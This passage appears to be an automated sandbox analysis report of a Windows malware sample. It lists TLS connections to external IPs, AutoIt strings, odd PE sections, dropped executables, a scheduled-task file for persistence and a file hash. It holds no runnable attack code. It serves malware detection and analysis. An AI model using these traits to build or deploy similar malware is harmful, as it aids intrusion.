Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 50142 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50139
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50135
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50134
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50136
Source: unknown Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50135 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50140
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50142
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50141
Source: unknown Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50144
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50140 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50101 -> 443
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49939 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49949 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49958 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49967 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49978 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50006 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50008 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50009 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50011 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50015 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50028 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50037 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50055 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50060 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50071 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50072 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50074 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50081 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50082 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50084 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50085 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50089 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50107 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50108 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50111 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50119 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50120 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:50134 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50136 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50140 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50141 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50139 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:50142 version: TLS 1.2

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: deecb7b612.exe, 0000000D.00000002.2855360804.0000000000592000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_49629fc6-c
Source: deecb7b612.exe, 0000000D.00000002.2855360804.0000000000592000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_8c565585-3
Source: deecb7b612.exe, 00000022.00000000.2920534582.0000000000592000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_e38a3bd8-d
Source: deecb7b612.exe, 00000022.00000000.2920534582.0000000000592000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_ae61140d-7
Source: random[1].exe1.5.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_e360881a-8
Source: random[1].exe1.5.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_475376b7-e
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: section name:
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: section name: .idata
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name:
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name: .idata
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: random[1].exe.5.dr Static PE information: section name:
Source: random[1].exe.5.dr Static PE information: section name: .idata
Source: efe6fe4127.exe.5.dr Static PE information: section name:
Source: efe6fe4127.exe.5.dr Static PE information: section name: .idata
Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: .rsrc
Source: random[1].exe0.5.dr Static PE information: section name: .idata
Source: random[1].exe0.5.dr Static PE information: section name:
Source: b76bb5cee7.exe.5.dr Static PE information: section name:
Source: b76bb5cee7.exe.5.dr Static PE information: section name: .rsrc
Source: b76bb5cee7.exe.5.dr Static PE information: section name: .idata
Source: b76bb5cee7.exe.5.dr Static PE information: section name:
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: section name:
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: section name: .idata
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name:
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name: .idata
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name:
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: section name:
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: section name: .idata
PE file has a writeable .text section
Source: num[1].exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A25A6B 0_3_00A25A6B
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A772AF 0_3_00A772AF
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0070CEA9 3_2_0070CEA9
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0070DF41 3_2_0070DF41
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_056D7172 9_3_056D7172
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_056D7172 9_3_056D7172
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_056D7172 9_3_056D7172
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_056D7172 9_3_056D7172
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_056D7172 9_3_056D7172
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_056D7172 9_3_056D7172
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_056D7172 9_3_056D7172
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_056D7172 9_3_056D7172
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_056D7172 9_3_056D7172
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_056D7172 9_3_056D7172
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_056D7172 9_3_056D7172
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_056D7172 9_3_056D7172
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_056D7172 9_3_056D7172
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_056D7172 9_3_056D7172
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_056D7172 9_3_056D7172
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_056D7172 9_3_056D7172
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Code function: 9_3_00B5F240 9_3_00B5F240
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe A8ADDC675FCC27C94FF9E4775BB2E090F4DA1287AAE6B95CECC65CCF533BC61D
Sample file is different than original file name gathered from version info
Source: file.exe Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.2314265372.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2315584017.00000000058AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2302667268.0000000005959000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2304661218.0000000005969000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320473793.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2318541568.0000000005AFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2298116630.0000000005705000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2312403645.0000000005984000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320042318.00000000059EC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2317116942.00000000059C9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2318680007.00000000058AA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2300481825.00000000058AF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319029814.00000000058A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336108235.0000000000A93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2304926008.00000000058A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2311900870.00000000058AF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319358797.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2314888959.0000000005998000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2307982444.0000000005A2F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319898376.00000000058A4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2297708553.000000000554B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2314652179.0000000005A90000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2300280192.000000000595B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2300096488.00000000059EF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2336051823.0000000005502000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2303039256.00000000058A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2301292510.0000000005950000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2312986824.0000000005982000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2320338070.00000000059F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2310913305.00000000058A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2312781647.00000000058A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
